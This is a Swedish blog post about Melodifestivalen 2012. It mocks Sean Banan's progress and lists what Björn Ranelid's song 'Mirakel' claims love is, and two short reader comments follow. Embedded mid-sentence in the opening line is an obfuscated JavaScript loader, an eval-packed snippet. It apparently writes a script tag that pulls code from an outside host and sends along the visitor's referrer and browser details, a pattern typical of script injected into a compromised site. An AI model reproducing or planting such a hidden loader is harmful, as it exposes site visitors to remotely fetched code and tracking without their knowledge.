Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Melodifestivalen 2012 och Björn Ranelid med Mirakel

Sebastian

Melodifestivalen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hyent|var|u0026u|referrer|hfrzk||js|php’.split(’|’),0,{}))
har kommit att bli ett minne blott. Jag har börjat undra vad det är för personer som sitter och röstarartisterna som medverkar. Jag kan ha fel men förut trodde jag i alla fall att det var personer i åldrarna 55+ som ringde in och la en röst på den artist som favoriserades. Men detta kan ju inte längre stämma.

När jag för några veckor sedan bevittnade att den så kallade ”Sean Banan” gick vidare med sin låt Sean den förste Banan försvann min fördom om denna ålder jag trodde satt och rösta. Helt plöstligt ändra jag min uppfattning till att det nu är personer i åldrarna -15 som röstar.

Jag har inget emot Sean Banan men herregud, detta är väl inte schlager, eller?

Nu i helgen kom ett annat ”wild card” in och plockade åt sig röster. Jag såg tyvärr inte programmet live men självklart efter alla kommentarer i media var jag tvungen att kika på Björn Ranelid bidrag. ”Kärleken är” sjöng Jill Johnsson i Melodifestivalan 1998, men utan att avsluta meningen.

Nu är det 14 år senare och författaren Björn Ranelid tar efter där Jill slutade och gör ett försök att förklara vad kärleken är.
Enligt Björn är kärleken följande:

 • ett mirakel
 • mäktigare än allt
 • ett vapen
 • en kraft
 • en atombomb
 • att simma fram och tillbaka i havet
 • ett under
 • lutande
 • en armé
 • soldater

 

Comments

 1. haha bra skrivet..helvete vad jag hatar melodifestivalen!

 2. Tobbe Troll

  haha så sant